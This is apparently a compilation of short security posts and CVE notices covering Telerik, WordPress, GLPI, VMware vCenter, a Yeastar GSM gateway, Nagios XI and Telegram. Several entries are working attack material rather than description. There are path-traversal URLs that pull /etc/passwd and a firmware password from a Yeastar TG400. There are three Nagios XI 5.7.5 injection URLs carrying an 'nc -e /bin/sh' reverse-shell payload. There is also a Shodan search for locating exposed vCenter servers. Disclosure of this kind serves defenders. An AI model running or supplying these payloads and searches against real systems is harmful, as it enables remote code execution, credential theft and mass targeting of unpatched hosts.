This looks like a false positive, because: * obtaining the MS AJAX framework script is not a security vulnerability - it is a publicly available script that can also be served from the standard webresource handler * the presence of code that contains the `true` keyword (which is a reserved word in JavaScript as well) does not prove a command was executed on the server * the Telerik WebResource handler is supposed to combine scripts based on server settings and the fact that requesting the handler returns Telerik code is not a vulnerability by itself - this is also code that is publicly avaialble (for example, from the Telerik CDN) and it is a JavaScript code that is not generated based on

I. VULNERABILITY ------------------------- Data Manipulation with X-Forwarded-For header at WordPress II. CVE REFERENCE ------------------------- CVE-2020-35539 III. VENDOR ------------------------- https://wordpress.org IV. TIMELINE ------------------------- 20/12/2020 Vulnerability discovered 21/12/2020 Vendor contacted 09/03/2021 CVE Assigned V. CREDIT ------------------------- Alphan Yavas VI. DESCRIPTION ------------------------- "X-Forwarded-For" is a HTTP header used to carry the client's original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X

CVE-2021-21327 recently found in GLPI by Iterasec allows remote PHP objects instantiation Technical writeup and exploit included for research purposes: https://iterasec.com/cve-2021-21327-unsafe-reflection-in-getitemforitemtype-in-glpi/

Shodan dork of CVE-2021-21972 VMware vCenter Server vSphere Client Remote Code Execution: https://www.shodan.io/search?query=http.title:%22ID_VC_Welcome%22

VMware vCenter Server vSphere Client remote code execution Attackers can gain root privilege by exploiting CVE-2021-21972. This is an easy to exploit vulnerability. Therefore future exploitation is likely. Also, this vulnerability exists in all default installations. Apply workarounds urgently: https://kb.vmware.com/s/article/82374

Path Traversal on Yeastar TG400 GSM Gateway - 91.3.0.3 To get firmware decrypting password: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect To get /etc/paswd: http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd https://github.com/SQSamir/CVE-2021-27328

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=e2401df06a3892ba612df20e1ce2f559d7647c4b5fcba7f64c23c0ea9df1564f&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=5693&token=123&submitButton2= Payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=4e4f78ca5c24c7c526dc86b23092b81c3231a7bf59e1eb67f9918b8daf7b6de9&nextstep=3&wizard=switch&ip_address=127.0.0.1;nc -e /bin/sh 127.0.0.1 4445;&port=161&snmpversion=2c&snmpopts%5Bsnmpcommunity%5D=public&snmpopts%5Bv3_security_level%5D=authPriv&snmpopts%5Bv3_username%5D=&snmpopts%5Bv3_auth_password%5D=&snmpopts%5Bv3_auth_proto%5D=MD5&snmpopts%5Bv3_priv_password%5D=&snmpopts%5Bv3_priv_proto%5D=DES&portnames=number&scaninterfaces=on&bulk_fields%5B%5D=ip_address&bulk_fields%5B%5D=&bulk_fields%5B%5D=&bulk_options=&bulk_fields%5B%5D=&bulk_fields%5B%5D=&warn_spee

Nagios XI 5.7.5 RCE POC (Works with admin/non-admin authentication): https://10.0.2.15/nagiosxi/config/monitoringwizard.php?update=1&nsp=50c0f98fe9018dc43c81672ad1aeed5fd3f9710f013381519e553f846b5c2a86&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&plugin_output_len=&ip_address=127.0.0.1&domain=127.0.0.1&username=asdf&password=asdf&auth_file=&plugin_output_len=1024;%20nc%20-e%20/bin/sh%20127.0.0.1%204444;&submitButton2= payload: 1024; nc -e /bin/sh 127.0.0.1 4444; https://github.com/fs0c-sh/nagios-xi-5.7.5-bugs

Telegram prior to 7.4 (212543) for macOS (7.3 (211334) Stable) stores local passcode in plain text. https://www.inputzero.io/2020/12/telegram-privacy-fails-again.html